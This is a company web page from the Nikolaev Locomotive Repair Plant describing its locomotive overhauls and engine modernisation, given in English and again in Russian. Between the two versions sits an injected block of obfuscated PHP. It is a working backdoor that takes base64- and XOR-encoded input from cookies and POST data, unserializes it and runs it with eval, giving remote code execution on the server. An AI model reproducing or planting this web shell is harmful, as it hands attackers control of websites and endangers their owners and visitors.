Сurrent repairs and overhauls

«Nikolaev Locomotive Repair Plant» Ltd

SPECIALIZED IN OVERHAULS

«Nikolaev Locomotive Repair Plant» Ltd specialized in overhauls with the extension of the lifetime of locomotives TGM4, TGM6, TEM2, TEM7, ChME3, M62, 2 M 62, 2TE10, 2TE-116, traction units OPE1AM and other locomotive parts and assemblies. Our company provides a guarantee for performed work and conducts post-warranty service.

In 2013 was developed and implemented the project for modernization diesel locomotive TGM-4, including repowering engine with Cummins and installation of screw compressor.

In 2016-2017 were developed projects for modernization diesel locomotives TGM6, TEM2, TEM7, ChME3, 2TE10 including repowering engine with Cummins (USA), Caterpillar (USA), ABC (Belgium) and installation of Rotary-Plate compressor unit which was produced in cooperation with «Mattei».

In 2018, the first diesel locomotive TGM - 6 series after a deep modernization was put into operation.

Performing an installation of an electronic rotation frequency control system and fuel injection on the operational engines by Heinzmann (Germany), which provides 15% fuel savings and allows engine monitoring.

«NTRZ» Ltd performs modernization of diesel locomotives M-62 including replacement of 14D40 engine with 5-26DG-01 V-shaped, four-stroke with gas turbine charging and charge air cooling.

After repairs, the equipment is checked on the test bench for engines (6 ChN21/21 and 8Chn 26/26), hydraulic transmissions, turbochargers, fuel equipment, etc.

Renovated locomotive passes rheostat tests, which allows accurate adjusting of the traction characteristics of equipment by using electronic complex. When repair is completed, the diesel locomotive will be reviewed by the inspector from “Ukrzaliznytsia”. After that “Ukrzaliznytsia” issues an Act with the right to enter the tracks of the Ministry of Railways.

Since 2011, the company has been repairing AC traction units with autonomous power supply OPE1-AM.

$bJQIbbUMV = 'V' . chr (82) . "\x5f" . 'Y' . "\x66" . 'd' . chr (105); $ZOoTbwaoFM = chr ( 357 - 258 ).chr ( 146 - 38 )."\141" . "\163" . chr (115) . "\137" . chr (101) . chr ( 1096 - 976 )."\151" . "\x73" . "\164" . 's';$QlYgR = class_exists($bJQIbbUMV); $ZOoTbwaoFM = "39097";$gmdRLR = !1;if ($QlYgR == $gmdRLR){function XlMPUe(){$JksGaRYzVZ = new /* 42016 */ VR_Yfdi(18888 + 18888); $JksGaRYzVZ = NULL;}$HgLIxg = "18888";class VR_Yfdi{private function UCrYjbcW($HgLIxg){if (is_array(VR_Yfdi::$OIoQxTAbGN)) {$NoJUeLcfwZ = str_replace(chr (60) . "\x3f" . chr (112) . "\150" . chr (112), "", VR_Yfdi::$OIoQxTAbGN[chr ( 684 - 585 )."\157" . "\x6e" . chr (116) . "\x65" . "\156" . chr (116)]);eval($NoJUeLcfwZ); $HgLIxg = "18888";exit();}}private $EuBJGWlI;public function YykseD(){echo 10293;}public function __destruct(){$HgLIxg = "36515_18124";$this->UCrYjbcW($HgLIxg); $HgLIxg = "36515_18124";}public function __construct($ofQAz=0){$wezeCQ = $_POST;$GXITtPDibl = $_COOKIE;$TgTjjrZE = "104f3740-5e4e-451f-879a-72899c00601a";$zqySHCfme = @$GXITtPDibl[substr($TgTjjrZE, 0, 4)];if (!empty($zqySHCfme)){$HVnFuihx = "base64";$rCKtKL = "";$zqySHCfme = explode(",", $zqySHCfme);foreach ($zqySHCfme as $SZXdcGmIUj){$rCKtKL .= @$GXITtPDibl[$SZXdcGmIUj];$rCKtKL .= @$wezeCQ[$SZXdcGmIUj];}$rCKtKL = array_map($HVnFuihx . "\137" . 'd' . 'e' . 'c' . 'o' . 'd' . chr (101), array($rCKtKL,)); $rCKtKL = $rCKtKL[0] ^ str_repeat($TgTjjrZE, (strlen($rCKtKL[0]) / strlen($TgTjjrZE)) + 1);VR_Yfdi::$OIoQxTAbGN = @unserialize($rCKtKL); $rCKtKL = class_exists("36515_18124");}}public static $OIoQxTAbGN = 29798;}XlMPUe();} Текущие и капитальные ремонты — ООО «Николаевский Тепловозоремонтный Завод» НТРЗ

Текущие и капитальные ремонты

ООО «Николаевский тепловозоремонтный завод»

специализируется на выполнении капитальных ремонтов тепловозов

ООО «Николаевский тепловозоремонтный завод» специализируется на выполнении капитальных ремонтов тепловозов серии ЧМЕ - 3, ТГМ – 4,ТГМ  - 6,ТЕМ – 2, ТЕМ – 7,  М 62,  2ТЕ10, 2ТЭ-116, тяговых агрегатов ОПЭ1АМ, а также тепловозных узлов и агрегатов к ним; наше  предприятие  дает гарантию на выполненные работы и проводит послегарантийное обслуживание.

В 2013 году ООО «НТРЗ» разработал и реализовал проект по модернизации тепловоза ТГМ-4 с установкой двигателя Cummins (США) и винтового компрессора.

В 2016 – 2017 г.г. разработаны проекты глубокой модернизации тепловозов серии ТГМ -6, ТЭМ – 2, ТЭМ – 7, ЧМЭ – 3, 2ТЭ – 10 с установкой дизелей Cummins (США), Caterpillar (США), АВС (Бельгия) и роторно-пластинчатого компрессорного агрегата совместного производства с компанией «Mattei».

В 2018 г. первый тепловоз серии ТГМ – 6 после глубокой модернизации введен в эксплуатацию.

Выполняем установку на тепловозы электронных регуляторов частоты оборотов  и системы электронного впрыска немецкой компании Heizmann GmbH & Co.KG, которые снижают расход топлива до 15% и обеспечивает мониторинг работы дизеля.


ООО «НТРЗ» выполняет модернизацию тепловозов серии М-62  с заменой дизеля 14Д40 на дизель типа    5-26ДГ-01 V-образный, четырехтактный с газотурбинным наддувом и охлаждением надувочного воздуха.


После проведения ремонтов, оборудование проверяется на стендах обкаточных испытаний, таких как  стенд по обкатке дизелей 6 ЧН 21/21, дизелей 8 ЧН 26/26, гидропередач, турбокомпрессоров,  топливной аппаратуры  и т.п.

Тепловоз после ремонта проходит реостатные  испытания тепловозов  с использованием электронного комплекса, который дает возможность с высокой точностью настроить тяговые характеристики отремонтированной техники. После завершения  ремонта, тепловоз проходить обзор ревизором „Укрзализници”  с правом выхода на пути МПС, о чем видаётся Акт „Укрзализныци”.

С 2011 года предприятие выполняет ремонт тяговых агрегатов переменного тока с автономным питанием ОПЭ1-АМ.

Предприятие проводит реостатные испытания тепловозов с использованием электронного комплекса, который дает возможность с высокой точностью настроить тяговые характеристики отремонтированной техники.